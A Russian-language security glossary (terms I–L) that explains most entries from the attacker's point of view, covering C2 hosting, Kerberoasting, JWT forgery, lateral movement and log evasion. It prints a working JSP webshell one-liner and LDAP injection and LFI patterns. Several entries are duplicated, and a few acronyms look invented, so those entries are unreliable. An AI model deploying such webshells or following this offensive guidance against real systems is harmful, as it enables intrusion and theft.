ISAC (Information Sharing and Analysis Center) Центры обмена информацией об угрозах по отраслям: FS-ISAC (финансы), Health-ISAC (здравоохранение), MS-ISAC (государственные и местные органы власти). ISAC координируются с CISA. Для атакующего ISAC означает, что информация о его атаке может быстро распространиться среди организаций одной отрасли, что ускорит обнаружение.

ISO (International Organization for Standardization) Организация, разрабатывающая международные стандарты, включая стандарты информационной безопасности (ISO 27001). Для атакующего ISO-сертифицированная организация, вероятно, имеет более зрелые процессы безопасности.

ISP (Internet Service Provider) Интернет-провайдер. ISP может: предоставлять IP-адреса, блокировать порты (25, 80, 443), логировать трафик, сотрудничать с law enforcement. Для атакующего выбор ISP важен: провайдеры в странах без экстрадиции (bulletproof hosting) предпочтительны для C2.

IVR (Interactive Voice Response) Система голосового меню (автоответчик). IVR используется в vishing-атаках: атакующий звонит в helpdesk, навигируется по IVR (DTMF-тона), попадает на оператора. Знание IVR-меню (какую цифру нажать, чтобы попасть в IT support) ускоряет атаку.

J

Jailbreak Процесс взлома ограничений операционной системы iOS (iPhone, iPad) или других платформ для получения root-доступа, возможности устанавливать неподписанные приложения, модифицировать системные файлы. Jailbreak используется для: установки малвари (которая не пройдет App Store), обхода sandbox, доступа к данным других приложений (банковские приложения, мессенджеры). Для атакующего jailbreak способ получить контроль над устройством жертвы, если есть физический доступ или возможность убедить жертву выполнить jailbreak (социальная инженерия). В корпоративной среде jailbreak рассматривается как критическая уязвимость: устройства могут быть исключены из MDM (Intune, Jamf) или стерты удаленно.

JARM Техника fingerprinting TLS-серверов, использующая активное сканирование: отправка специально сформированных TLS Client Hello пакетов и анализ ответов сервера. JARM создает уникальный отпечаток (хэш), который может идентифицировать тип сервера (Cobalt Strike, Apache, Nginx) и даже конкретную конфигурацию. Используется защитниками для обнаружения C2-серверов и атакующими для проверки, не детектируется ли их инфраструктура. JARM fingerprint Cobalt Strike отличается от легитимного веб-сервера, поэтому атакующие модифицируют TLS-стек Cobalt Strike (malleable C2) или используют прокси (Cloudflare) для маскировки.

Java Язык программирования и платформа, широко используемая в корпоративных приложениях (Oracle WebLogic, Apache Tomcat, Jenkins, Jira). Java-приложения уязвимы к: десериализации (ObjectInputStream), RCE через уязвимости библиотек (Log4Shell), misconfig (JMX, RMI). Атакующие эксплуатируют Java-уязвимости для initial access, особенно в legacy-системах. Java-апплеты (устаревшие) использовались для drive-by download. Java-малварь может быть обфусцирована (Zelix KlassMaster, ProGuard) и загружаться через reflection.

JavaScript (JS) Язык программирования, выполняемый в браузере. JavaScript используется для: XSS (Cross-Site Scripting), session hijacking (кража cookies), drive-by download, криптомайнинга (Coinhive), фишинга (поддельные формы ввода). Для атакующего JavaScript инструмент для client-side атак: можно внедрить скрипт через XSS, который будет красть данные, выполнять действия от имени пользователя, перенаправлять на фишинговые сайты. ShinyHunters использовал JS в модифицированном Aura Inspector для эксфильтрации данных Salesforce через API.

JCE (Java Cryptography Extension) Расширение криптографии Java, определяющее политики шифрования (ограничения на длину ключей). В 2026 JCE Unlimited Strength Jurisdiction Policy Files позволяют использовать AES-256 и другие сильные алгоритмы. Для атакующего JCE важно: если атакуемое Java-приложение использует слабую криптографию (AES-128, DES) из-за ограничений JCE, это может быть использовано для взлома.

JDB (Java Debugger) Отладчик Java. JDB может быть использован для: динамического анализа Java-приложений, поиска уязвимостей, модификации поведения приложения во время выполнения. Для атакующего JDB инструмент для реверс-инжиниринга целевых Java-приложений (например, панелей управления малварью, проприетарного ПО).

JDBC (Java Database Connectivity) API для подключения Java-приложений к базам данных (SQL). JDBC-строки подключения могут содержать пароли в plaintext. Для атакующего кража JDBC-строк (из конфигурационных файлов, переменных окружения, дампа памяти) дает доступ к базам данных. JDBC-инъекции (SQL injection через JDBC) классический вектор.

JEA (Just Enough Administration) Технология Microsoft для ограниченного администрирования через PowerShell, позволяющая делегировать права без предоставления полного административного доступа. JEA используется для защиты от lateral movement: даже если учетная запись скомпрометирована, она может выполнять только ограниченный набор команд. Для атакующего JEA препятствие: нужно искать другие учетные записи или обходить ограничения через эксплуатацию уязвимостей в самом JEA.

JET (Joint Evaluation Team) Группа оценки безопасности. В контексте атак JET не имеет прямого отношения, но в военном контексте координация между USCYBERCOM и другими структурами.

JIT (Just-In-Time) Compilation Компиляция "на лету": метод, используемый в .NET, Java, JavaScript, при котором байткод (CIL, Java bytecode) компилируется в машинный код во время выполнения. Для атакующего JIT интересен тем, что малварь может быть загружена в виде байткода и скомпилирована JIT-компилятором, что усложняет статический анализ. Некоторые атаки используют JIT для генерации shellcode на лету (JIT spraying).

JNDI (Java Naming and Directory Interface) API Java для доступа к службам каталогов (LDAP, DNS, RMI). JNDI стал широко известен после уязвимости Log4Shell (CVE-2021-44228), где злоумышленник мог выполнить произвольный код через JNDI lookup. Для атакующего JNDI вектор атаки на Java-приложения, использующие логирование (Log4j, Logback) или другие библиотеки, где пользовательский ввод может быть передан в JNDI.

Job Offer PDF Фишинговый документ (PDF), отправляемый разработчикам или IT-специалистам как "оффер" на работу. Job offer PDF часто содержит макросы, ссылки на фейковые порталы, или вредоносные вложения. Bybit hack начался с отправки job offer PDF dev-у Safe{Wallet}, который содержал инфостилер. Для атакующего job offer PDF эффективный вектор, потому что разработчики ожидают предложений о работе, особенно на платформах типа LinkedIn.

John the Ripper (John) Инструмент для взлома паролей (оффлайн), поддерживающий множество форматов хэшей (Unix crypt, NTLM, Kerberos, MD5, SHA1, bcrypt). John используется для оффлайн-взлома хэшей, полученных через DCSync, дамп NTDS.dit, или из файлов конфигурации. John может использовать GPU (OpenCL, CUDA) для ускорения. В 2026 John остается стандартом наряду с Hashcat.

Join (Active Directory) Ввод компьютера в домен Active Directory (domain join). Компьютеры в домене управляются групповыми политиками (GPO), имеют централизованную аутентификацию. Для атакующего компьютеры в домене цель: после компрометации одного компьютера можно двигаться по доверительным отношениям домена.

JOP (Jump-Oriented Programming) Техника эксплуатации, аналогичная ROP (Return-Oriented Programming), но использующая jump-инструкции вместо return. JOP используется для обхода защит (CFG Control Flow Guard, CET Control-flow Enforcement Technology), когда return-инструкции защищены. Для атакующего JOP требует наличия достаточного количества гаджетов (последовательностей инструкций, заканчивающихся jump) в исполняемом коде.

JOSE (JSON Object Signing and Encryption) Стандарт для подписи и шифрования JSON-объектов (JWS JSON Web Signature, JWE JSON Web Encryption). JOSE используется в JWT (JSON Web Tokens) для аутентификации. Для атакующего JOSE важен: misconfig в проверке подписи (none алгоритм), кража секретных ключей (HMAC) или приватных ключей (RSA, EC) позволяет подделывать JWT и получать несанкционированный доступ.

JPA (Java Persistence API) API для объектно-реляционного отображения (ORM) в Java. JPA-приложения могут быть уязвимы к JPA injection (аналог SQL injection), если запросы строятся из пользовательского ввода без параметризации. Для атакующего JPA-приложения цель, как и любые другие веб-приложения с базами данных.

JRE (Java Runtime Environment) Среда выполнения Java, необходимая для запуска Java-приложений. JRE содержит библиотеки и JVM (Java Virtual Machine). Уязвимости в JRE могут быть использованы для удаленного выполнения кода (RCE) на системах, где запущены Java-приложения. В 2026 многие организации все еще используют устаревшие JRE (Java 6, 7, 8) для legacy-приложений, что создает возможности для атак.

JS (JavaScript) Язык программирования, выполняемый в браузере. JavaScript используется для: XSS (Cross-Site Scripting), session hijacking (кража cookies), drive-by download, криптомайнинга (Coinhive), фишинга (поддельные формы ввода). Для атакующего JavaScript инструмент для client-side атак: можно внедрить скрипт через XSS, который будет красть данные, выполнять действия от имени пользователя, перенаправлять на фишинговые сайты. JavaScript также используется на сервере (Node.js) для веб-приложений, API, C2.

JSBeautifier Инструмент для форматирования (beautify) минифицированного JavaScript-кода, делая его читаемым. Используется для анализа обфусцированного JavaScript (в XSS-пейлоадах, фишинговых сайтах, малвари). Для атакующего JSBeautifier инструмент для реверс-инжиниринга чужого кода.

JSC (JavaScriptCore) Движок JavaScript в WebKit (Safari). Уязвимости в JSC (JavaScriptCore) могут использоваться для RCE на iOS/macOS через браузер. Для атакующего JSC поверхность атаки для получения доступа к устройствам Apple.

JSF (JavaServer Faces) Фреймворк для веб-приложений на Java. JSF-приложения могут быть уязвимы к: XSS, CSRF, view state manipulation (сериализованное состояние может содержать чувствительные данные). Для атакующего JSF-приложения цель, как и любые другие Java-веб-приложения.

JSON (JavaScript Object Notation) Формат обмена данными, широко используемый в API, конфигурациях, веб-приложениях. JSON-инъекции возможны, если приложение генерирует JSON из пользовательского ввода без экранирования, что может привести к инъекции JavaScript (XSS) или нарушению структуры. JSON Web Tokens (JWT) используются для аутентификации; их подделка распространенная техника.

JSON Web Encryption (JWE) Стандарт шифрования JSON-объектов (RFC 7516). JWE используется для защиты данных в JWT. Для атакующего JWE важен: если удалось получить ключ шифрования, можно расшифровать содержимое токенов.

JSON Web Key (JWK) JSON-объект, представляющий криптографический ключ (RSA, EC, HMAC). JWK используется в JWT для подписи и шифрования. Для атакующего кража JWK (из конфигураций, переменных окружения) позволяет подделывать JWT.

JSON Web Signature (JWS) Стандарт подписи JSON-объектов (RFC 7515). JWS используется в JWT для аутентификации. Уязвимости: none алгоритм (подпись не проверяется), алгоритм confusion (использование RSA вместо HMAC), утечка секретных ключей. Для атакующего exploitation JWS может дать доступ к системам, использующим JWT.

JSON Web Token (JWT) Токен для аутентификации и обмена данными в формате JSON, подписанный (JWS) или зашифрованный (JWE). JWT используется в OAuth 2.0, OpenID Connect, API-аутентификации. Атаки на JWT: подделка токена (none algorithm), кража секретного ключа, алгоритм confusion (RS256 vs HS256), эксплуатация слабых ключей, кража токенов через XSS. Для атакующего JWT цель: поддельный токен может дать доступ к учетной записи любого пользователя, включая администратора.

JSP (JavaServer Pages) Технология для создания динамических веб-страниц на Java. JSP-файлы могут содержать Java-код, который выполняется на сервере. Атакующие могут загружать вредоносные JSP-файлы (webshell) через уязвимости загрузки файлов, чтобы получить выполнение команд на сервере. JSP webshell классический backdoor для Java-серверов (Tomcat, WebLogic, JBoss).

JSP Webshell Вредоносный JSP-файл, загруженный на веб-сервер (Tomcat, WebLogic, JBoss), который позволяет выполнять команды на сервере через HTTP-запросы. JSP webshell используется для persistence и C2. Пример: <% Runtime.getRuntime().exec(request.getParameter("cmd")); %>. JSP webshell может быть замаскирован под легитимный файл (например, error.jsp).

JSTL (JavaServer Pages Standard Tag Library) Стандартная библиотека тегов для JSP. JSTL может быть использована в атаках, если приложение не экранирует вывод (XSS). Для атакующего JSTL не прямой вектор, но часть экосистемы JSP.

JTAG (Joint Test Action Group) Интерфейс для отладки и тестирования печатных плат и микросхем. JTAG используется для: дампа прошивки (firmware), записи вредоносного кода в память устройств, отладки embedded-систем. Для атакующего JTAG способ физического доступа к устройствам для извлечения ключей, модификации прошивки.

Jump Box Специально выделенный сервер (или виртуальная машина), который используется как промежуточный узел для доступа к защищенным сегментам сети (production-среды, базы данных, OT-сети). Jump box единственная точка входа в эти сегменты, доступ к нему строго ограничен (обычно только через VPN, с MFA, с whitelist IP). Для атакующего компрометация jump box критический успех: получив контроль над jump box, атакующий получает доступ ко всем системам, которые находятся за ним, обходя межсетевые экраны и сегментацию. Jump box часто имеет две сетевые карты (dual-homed): одна для управления (IT-сеть), другая для доступа к защищенному сегменту. После компрометации административной учетной записи с доступом к jump box, атакующий может использовать его для lateral movement, эксфильтрации данных, развертывания малвари. Jump box также может быть реализован как "jump host" в облачных средах (AWS Systems Manager Session Manager, Azure Bastion). В атаке на Stryker Handala не нуждалась в jump box, потому что Intune имел прямой доступ ко всем устройствам.

Jump Host Синоним jump box: сервер, используемый как шлюз (gateway) для доступа к внутренним сетям, изолированным от прямого интернет-доступа. Jump host часто работает на базе Linux или Windows, доступ к нему осуществляется через SSH (с ключами, без паролей) или RDP (с MFA). Jump host может быть реализован как "bastion host" в терминологии AWS. Для атакующего jump host цель: если удается скомпрометировать учетную запись, имеющую доступ к jump host, или украсть SSH-ключи, можно перейти в защищенные сегменты. Jump host также может использоваться для туннелирования трафика (SSH tunneling, RDP tunneling) через защищенные сети. В отличие от jump box, jump host часто подразумевает использование SSH как основного протокола доступа. В корпоративных средах jump host часто логирует все действия, что создает риск для атакующего: нужно чистить логи или использовать методы, не оставляющие следов (например, memory-only payloads).

Junk Code "Мусорный" код: инструкции, которые не влияют на функциональность программы, но добавлены для усложнения анализа (обфускация). Junk code используется в малвари для: увеличения размера, усложнения реверс-инжиниринга, сокрытия вредоносной логики среди легитимных операций. Антивирусы могут пропускать малварь с большим количеством junk code, так как сигнатуры не совпадают.

Just-in-Time (JIT) Spraying Техника эксплуатации, при которой атакующий выделяет память с большим количеством страниц, содержащих JIT-скомпилированный код, который затем используется для обхода ASLR и DEP. JIT spraying используется в браузерных атаках, когда JavaScript движок (JIT) компилирует код, который становится предсказуемым по адресу.

JVM (Java Virtual Machine) Виртуальная машина Java, исполняющая Java-байткод. JVM цель атак: уязвимости в JVM могут дать RCE (remote code execution) на системе, где запущено Java-приложение. Методы атак: десериализация (ObjectInputStream), уязвимости в JIT-компиляторе, обход sandbox. В 2026 многие организации используют устаревшие JVM (Java 8) для legacy-приложений.

JWT (JSON Web Token) JSON Web Token (JWT) компактный, URL-безопасный токен для передачи утверждений (claims) между сторонами. JWT состоит из трех частей: header (алгоритм, тип), payload (данные: пользователь, права, срок действия), signature (подпись). Используется для аутентификации в API, OAuth 2.0, OpenID Connect. Атаки на JWT: none algorithm (подпись не проверяется), алгоритм confusion (RS256 vs HS256), кража секретного ключа, эксплуатация слабых ключей, кража токенов через XSS. Для атакующего JWT цель: поддельный токен может дать доступ к учетной записи любого пользователя, включая администратора.

JWT Confusion Атака на JWT, основанная на смешении алгоритмов: сервер ожидает подпись асимметричным алгоритмом (RS256), но получает токен, подписанный симметричным (HS256), и использует публичный ключ RSA как секретный ключ HMAC. Это позволяет атакующему подделать подпись. JWT confusion требует знания публичного ключа сервера (часто доступен через JWKS endpoint).

K

Kali Linux Дистрибутив Linux, специализированный для пентеста и безопасности. Kali содержит сотни инструментов: сканеры уязвимостей (Nmap, OpenVAS), инструменты для взлома паролей (John, Hashcat), фреймворки для эксплуатации (Metasploit), инструменты для беспроводных атак (Aircrack-ng), социальной инженерии (SET), реверс-инжиниринга (Ghidra, IDA Free). Kali стандартная ОС для пентестеров, но атакующие также используют ее (как базовую среду) и кастомизируют для своих нужд (установка кастомных C2, скрытие активности). В 2026 Kali остается наиболее популярным дистрибутивом для хакерских задач.

Kerberoasting Атака на Kerberos, при которой атакующий запрашивает билеты для сервисных учетных записей (SPN Service Principal Names) и извлекает их хэши (RC4_HMAC, AES256_CTS_HMAC_SHA1). Эти хэши затем взламываются оффлайн (Hashcat, John). Kerberoasting позволяет атакующему получить пароли сервисных учетных записей, которые часто имеют повышенные привилегии (например, учетные записи для запуска приложений, SQL-серверов). Атака не требует повышенных прав (достаточно обычного доменного пользователя). BloodHound может выявить учетные записи, уязвимые к Kerberoasting.

Kerberos Протокол сетевой аутентификации, используемый в Active Directory (и других системах). Kerberos использует билеты (tickets) для аутентификации, что позволяет избежать передачи пароля по сети. Атаки на Kerberos: Golden Ticket (подделка TGT), Silver Ticket (подделка service ticket), Kerberoasting (извлечение хэшей сервисных учетных записей для оффлайн-взлома), AS-REP Roasting (извлечение хэшей пользователей с отключенной предварительной аутентификацией). Kerberos основа безопасности AD, и его компрометация дает атакующему полный доступ к домену.

Kernel (Ядро) Центральная часть операционной системы (Windows, Linux, macOS), управляющая процессами, памятью, устройствами, системными вызовами. Ядро работает с наивысшими привилегиями (ring 0 в x86). Для атакующего компрометация ядра (kernel exploit) дает полный контроль над системой, возможность скрыть процессы (rootkit), отключить EDR, обойти все защитные механизмы. Kernel exploit может быть локальным (LPE) или удаленным (RCE) последнее редко. BYOVD (Bring Your Own Vulnerable Driver) техника получения kernel access через уязвимый драйвер.

Kernel Exploit Эксплойт, использующий уязвимость в ядре операционной системы для повышения привилегий (LPE) или выполнения кода с привилегиями ядра. Kernel exploit позволяет получить доступ к системной памяти, процессам, устройствам, обойти ASLR, DEP, CFG. Примеры: Dirty COW (Linux), CVE-2021-34527 (PrintNightmare), CVE-2019-1458 (Windows). Для атакующего kernel exploit финальная стадия эскалации после получения пользовательского доступа. В 2026 ядра современных ОС имеют множество защит (KASLR, SMAP, SMEP), что делает kernel exploit сложнее, но legacy-системы (Windows 7, старые ядра Linux) остаются уязвимыми.

KEV (Known Exploited Vulnerabilities) Каталог CISA, содержащий уязвимости, которые активно эксплуатируются в дикой природе. Федеральные агентства США обязаны исправлять уязвимости из KEV в установленные сроки (обычно 2 недели). KEV включает: CVE-2026-20131 (Cisco FMC, CVSS 10.0), CVE-2026-20963 (SharePoint, CVSS 8.8). Для атакующего KEV индикатор, какие уязвимости еще не исправлены во многих организациях (так как не все следуют требованиям CISA). Мониторинг KEV дает информацию о fresh 1-day.

Key Derivation Function (KDF) Функция формирования ключа, преобразующая пароль или мастер-ключ в криптографический ключ, используя соль (salt) и множество итераций (PBKDF2, bcrypt, scrypt, Argon2). KDF замедляет оффлайн-взлом хэшей. Для атакующего KDF препятствие: bcrypt (с 10 раундами) значительно медленнее NTLM, Argon2id еще медленнее. Поэтому при взломе хэшей паролей атакующие предпочитают атаковать NTLM (быстрый), а не bcrypt. В AD пароли пользователей хранятся в NTLM-хэше (быстрый), что облегчает взлом.

Key Exchange Обмен ключами: процесс, при котором две стороны создают общий секретный ключ по незащищенному каналу (Diffie-Hellman, ECDH). Key exchange используется в TLS, SSH, IPsec. Для атакующего key exchange интересен: если удалось скомпрометировать сессию (MITM), можно подменить ключи. Уязвимости: Logjam (DH с 1024-битными простыми числами), слабые кривые в ECDH. Forward secrecy (PFS) предотвращает расшифровку прошлых сессий после компрометации долговременного ключа.

Keylog (Keylogger) Кейлоггер (keylogger) программа или устройство для записи нажатий клавиш. Keylogger может быть: программным (hook на клавиатуру, перехват функций GetAsyncKeyState), аппаратным (USB-устройство между клавиатурой и компьютером), драйверным (перехват на уровне ядра). Keylogger используется для кражи паролей, сообщений, конфиденциальной информации. Инфостилеры (RedLine, LummaC2) часто содержат keylogger. Keylogger может работать в фоновом режиме, записывая все нажатия и отправляя на C2.

Keylogger Программа или устройство для записи нажатий клавиш (keylogging). Keylogger может быть: программным (hook на клавиатуру, перехват функций GetAsyncKeyState), аппаратным (USB-устройство между клавиатурой и компьютером), драйверным (перехват на уровне ядра). Keylogger используется для кражи паролей, сообщений, конфиденциальной информации. Инфостилеры (RedLine, LummaC2) часто содержат keylogger. Keylogger может работать в фоновом режиме, записывая все нажатия и отправляя на C2.

Keyring Хранилище ключей в Linux (GNOME Keyring, KWallet) и macOS (Keychain). Keyring хранит пароли, ключи SSH, сертификаты. Для атакующего keyring цель: инфостилер может извлечь пароли из GNOME Keyring (через D-Bus) или macOS Keychain (через security командлет). В Windows аналоги Credential Manager и DPAPI.

Kibana Инструмент визуализации данных из Elasticsearch, часть стека ELK (Elasticsearch, Logstash, Kibana). Kibana используется для анализа логов, построения дашбордов, обнаружения аномалий. Для атакующего Kibana цель: если удалось получить доступ к Kibana (misconfig, слабый пароль), можно читать логи, содержащие чувствительные данные (пароли, сессии), и удалять записи о своей активности.

Kill Chain Модель атаки (Cyber Kill Chain, разработанная Lockheed Martin), описывающая этапы: reconnaissance (разведка), weaponization (подготовка эксплойта), delivery (доставка), exploitation (эксплуатация), installation (установка), command & control (C2), actions on objectives (действия по достижению цели). Для атакующего kill chain фреймворк для планирования: нужно пройти все этапы, не будучи обнаруженным. Для защитников модель для построения детектов на каждом этапе. В 2026 kill chain дополнена этапами, связанными с AI и облаком.

KMS (Key Management Service) Служба управления ключами Microsoft для активации Windows и Office в корпоративной среде. KMS может быть скомпрометирован для: активации пиратского ПО, подмены ключей, внедрения backdoor. KMS-активация использует протокол, уязвимый к MITM (если не использовать HTTPS). В атаках KMS редко является прямой целью, но может быть точкой для lateral movement.

KQL (Kusto Query Language) Язык запросов, используемый в Azure Data Explorer, Microsoft Sentinel, и других продуктах Microsoft. KQL используется защитниками для охоты на угрозы (threat hunting) в логах. Для атакующего понимание KQL помогает понять, какие запросы используют защитники, и как их обойти (например, не создавать события, которые попадут в типичные KQL-запросы).

Krb5 Реализация Kerberos версии 5 (используется в Active Directory, MIT Kerberos, Heimdal). Krb5 уязвим к: атакам на билеты (Golden Ticket, Silver Ticket), Kerberoasting, AS-REP Roasting. Для атакующего Krb5 протокол, который нужно атаковать после компрометации AD.

KRL (Kerberos Realm) Область Kerberos (realm), обычно совпадающая с доменом Active Directory (в верхнем регистре, например, CONTOSO.COM). KRL используется для идентификации домена в билетах. Для атакующего KRL важно при создании Golden Ticket: нужно указать правильный realm, иначе билет не будет принят.

Kubeconfig Файл конфигурации для доступа к кластеру Kubernetes, содержащий URL API server, сертификаты, токены. Для атакующего кража kubeconfig (из дампа памяти, с диска, из CI/CD) дает полный контроль над кластером Kubernetes. Kubeconfig часто хранится в .kube/config на хостах разработчиков и в CI/CD пайплайнах.

Kubelet Агент на каждом узле Kubernetes, отвечающий за запуск контейнеров. Kubelet имеет API (порт 10250), который может быть открыт для атак. Уязвимости kubelet (CVE-2020-8554, CVE-2020-8557) могут привести к выполнению кода на хосте. Для атакующего kubelet цель для container breakout.

Kubernetes (K8s) Платформа для управления контейнерами (Docker). Kubernetes используется в облачных и on-prem средах. Атаки на Kubernetes: компрометация API server (misconfig, открытый порт 6443), кража kubeconfig, атаки на kubelet (уязвимости), контейнер-брейкаут (побег из контейнера на хост), атаки на etcd (база данных кластера). Kubernetes цель для криптомайнинга (cryptojacking) и эксфильтрации данных (кража секретов из Kubernetes secrets). Telus была скомпрометирована через GCP, что могло включать Kubernetes.

L

L0phtCrack Один из первых инструментов для взлома паролей Windows (LM-хэши, NTLM). L0phtCrack использовал словарные атаки, брутфорс, rainbow tables. В 2026 считается legacy, заменен Hashcat и John the Ripper, но его методы (LM-хэши, слабость LAN Manager) все еще актуальны для старых систем.

L2TP (Layer 2 Tunneling Protocol) Протокол туннелирования второго уровня, часто используемый с IPsec для VPN. L2TP/IPsec уязвим к: downgrade attacks, слабым PSK (Pre-Shared Keys), атакам на IPsec. Для атакующего компрометация L2TP VPN initial access в корпоративную сеть.

L7 (Layer 7) Прикладной уровень OSI (HTTP, DNS, SMTP, FTP). Атаки на L7: SQL injection, XSS, CSRF, HTTP flood, slowloris. L7 DDoS атаки сложнее фильтровать, чем сетевые, потому что трафик выглядит как легитимный.

Lab (Malware Analysis Lab) Изолированная среда для анализа малвари: виртуальные машины (VMware, VirtualBox), сетевая изоляция, инструменты мониторинга (Cape, Cuckoo, ProcMon, Wireshark). Аналитики запускают малварь в lab, чтобы изучить поведение, извлечь IoC. Для атакующего lab угроза: если малварь попадает в lab, ее сигнатуры становятся известны. Для обхода используются анти-сэндбокс техники.

Label (Data) Метка данных (в AI, в классификации). В контексте атак label poisoning техника, при которой злоумышленник изменяет метки в обучающих данных, чтобы модель AI (например, EDR на основе ML) выдавала неверные результаты (пропускала малварь).

LAG (Link Aggregation) Объединение сетевых интерфейсов для увеличения пропускной способности и отказоустойчивости. В контексте атак LAG может быть целью: компрометация одного из интерфейсов может дать доступ к трафику.

Lambda (AWS Lambda) Сервис бессерверных функций AWS. Lambda используется для: автоматизации (реагирование на события), выполнения кода без управления сервером. Для атакующего Lambda способ скрыть C2-активность: легитимные функции могут быть использованы для эксфильтрации (передача данных через Lambda), выполнения команд (если есть уязвимость в коде). Lambda имеет IAM-роли, которые могут быть использованы для доступа к другим AWS-ресурсам.

LAN (Local Area Network) Локальная сеть. Атаки в LAN: ARP poisoning, DHCP starvation, broadcast-атаки, lateral movement через SMB, RDP, WinRM. После initial access атакующий исследует LAN для поиска ценных систем.

LAN Manager (LM) Устаревший протокол аутентификации Windows, хранящий пароли в LM-хэшах (слабый, разбивает пароль на 7-символьные блоки). LM-хэши взламываются за секунды. В 2026 LM отключен по умолчанию в современных Windows, но может быть включен для совместимости с legacy-системами.

Land Attack DoS-атака, при которой отправляется TCP-пакет с одинаковым IP-адресом источника и назначения (SYN-пакет с IP жертвы на IP жертвы). Это вызывает зависание системы (если не защищена). Land attack классическая DoS-атака 1990-х, в 2026 редко встречается.

LANMAN (LM) LAN Manager (LM) устаревший протокол аутентификации Windows, хранящий пароли в LM-хэшах (слабый, разбивает пароль на 7-символьные блоки, не чувствителен к регистру). LM-хэши взламываются за секунды. В 2026 LM отключен по умолчанию в современных Windows, но может быть включен для совместимости с legacy-системами. Атаки на LM: захват LM-хэша через responder, оффлайн-взлом (Hashcat).

Lateral Movement Латеральное движение: перемещение атакующего по сети между компьютерами и серверами после initial access. Цель достичь систем с ценными данными (базы данных, контроллеры домена) и повысить привилегии. Методы: Pass-the-Hash, Pass-the-Ticket, RDP, PsExec, WMI, WinRM, DCOM, SMB. Lateral movement самый шумный этап атаки, требует тщательного планирования, чтобы не вызвать детекты EDR.

Lattice (Cryptography) Решетка в криптографии (lattice-based cryptography), используемая в пост-квантовых алгоритмах (Kyber, Dilithium). В 2026 пост-квантовая криптография внедряется, но legacy-системы остаются уязвимыми к квантовым атакам.

Lazarus Group APT-группа, связанная с Северной Кореей (DPRK). Lazarus известна: атаками на криптобиржи (Bybit $1.5B в феврале 2025), кибервымогательством (WannaCry), шпионажем, атаками на банки (SWIFT). Lazarus использует supply chain атаки (Bybit через Safe{Wallet}), сложные цепочки отмыва (tumblers, Monero, DeFi). Для атакующего Lazarus пример государственной группы, сочетающей финансовую мотивацию с политическими целями.

LBR (Last Branch Record) Механизм в процессорах Intel для записи истории переходов (ветвлений). LBR используется в EDR для обнаружения ROP/JOP атак. Для атакующего LBR препятствие: нужно избегать паттернов, которые будут записаны в LBR и проанализированы.

LBS (Location-Based Service) Сервисы, основанные на геолокации (GPS, Wi-Fi positioning). В контексте атак LBS используется для: отслеживания жертв (doxxing), таргетинга (атаки на основе местоположения), взлома через геолокационные данные (например, ответы на секретные вопросы "город рождения").

LCE (Local Code Execution) Выполнение кода на локальной системе, часто с привилегиями текущего пользователя. LCE может быть шагом к LPE (Local Privilege Escalation). В отличие от RCE (Remote Code Execution), LCE требует уже наличия доступа (shell, webshell).

LDAP (Lightweight Directory Access Protocol) Протокол доступа к службам каталогов (Active Directory, OpenLDAP). LDAP используется для: аутентификации, поиска пользователей и групп, изменения атрибутов. Атаки на LDAP: LDAP injection, анонимный доступ (если не настроена аутентификация), DCSync (через LDAP), кража данных (список пользователей). LDAP критический протокол в AD.

LDAP Injection Внедрение кода в LDAP-запросы, аналогично SQL injection. Пример: (|(user=*)(user=*)) вместо (user=admin). LDAP injection может привести к: обходу аутентификации (вход без пароля), краже данных (изменение фильтра для возврата всех записей), модификации данных. Встречается в веб-приложениях, использующих LDAP без экранирования.

LDR (LoadLibrary) Функция Windows для загрузки DLL в процесс. LDR используется в: DLL injection (вызов LoadLibrary в удаленном процессе), reflective DLL injection (без LoadLibrary), загрузке малвари. Для EDR вызов LoadLibrary в удаленном процессе триггер.

Leak (Data) Утечка данных: несанкционированное раскрытие конфиденциальной информации. Data leak может быть: публичным (ShinyHunters на leak site), приватным (продажа закрытым синдикатам), инсайдерским. Утечки данных используются для: extortion (вымогательство), credential stuffing, identity theft, BEC. Conduent (25M+ записей), Wynn (800k записей) примеры data leaks.

Leak Site Веб-сайт, на котором публикуются украденные данные. Leak site используется для extortion: если жертва не платит выкуп, данные публикуются. ShinyHunters имеет свой leak site с ультиматумами ("FINAL WARNING") и доказательствами (proof samples). Leak sites могут быть на dark web (Tor) или в открытом интернете (Limewire). Для атакующего leak site инструмент давления на жертву.

Least Privilege Принцип наименьших привилегий: пользователи и процессы должны иметь минимально необходимые права. Нарушение принципа (over-privileged accounts) одна из главных уязвимостей. ShinyHunters эксплуатировал over-privileged guest user в Salesforce. Для атакующего поиск over-privileged аккаунтов ключевая задача после initial access.

Legacy System Устаревшая система (Windows 7, Windows Server 2008, старые версии Linux, Java 6/7), которая больше не получает обновлений безопасности или используется с непропатченными уязвимостями. Legacy systems легкие цели для атакующих, потому что уязвимости известны и эксплойты доступны. Interlock атаковал Cisco FMC (appliance), который многие организации патчат медленно.

Levenshtein Distance Расстояние Левенштейна: мера разницы между двумя строками (минимальное количество вставок, удалений, замен). Используется в OSINT для поиска похожих доменов (typosquatting), фишинговых URL, поддельных профилей.

LF (Line Feed) Символ перевода строки. В атаках CRLF injection (Carriage Return Line Feed) используется для добавления новых заголовков в HTTP-ответы.

LFI (Local File Inclusion) Уязвимость, позволяющая включать локальные файлы на сервере через параметры веб-приложения. Пример: include($_GET['page']). LFI может привести к: чтению конфигурационных файлов (passwd, config.php), выполнению кода (через log poisoning, PHP wrappers), RCE. LFI часто встречается в PHP-приложениях.

LG (Local Group) Локальная группа Windows (Administrators, Users, Remote Desktop Users). Управление локальными группами может быть через групповые политики (GPO). Для атакующего добавление пользователя в локальную группу Administrators (через GPO или локально) способ persistence.

LGTM (Looks Good to Me) Фраза в code review, означающая одобрение изменений. В контексте supply chain атак злоумышленник может внедрить вредоносный код, который выглядит безобидно, и получить LGTM от ревьюверов.

Library (DLL) Библиотека динамической компоновки (Dynamic Link Library) в Windows. DLL содержат код, используемый несколькими приложениями. Атаки на DLL: DLL hijacking (подмена легитимной DLL), DLL sideloading (загрузка вредоносной DLL легитимным приложением), DLL injection (внедрение кода через LoadLibrary).

Library (Python) Библиотека Python. Supply chain атаки через PyPI (Python Package Index) публикация вредоносных пакетов с похожими именами (typosquatting). Разработчики скачивают и устанавливают пакет, который крадет данные или устанавливает backdoor.

Licensing (Software) Лицензирование ПО. В атаках используется: кража лицензионных ключей, использование пиратского ПО (cracked software) как вектор распространения малвари (инфостилеры через crack-сайты).

Lifetime (Token) Время жизни токена (JWT, OAuth, session cookie). Токены с длительным временем жизни цель для атакующих: украденный токен можно использовать долго. OAuth refresh tokens живут неделями, session cookies часами. Укорочение lifetime защита, но снижает удобство.

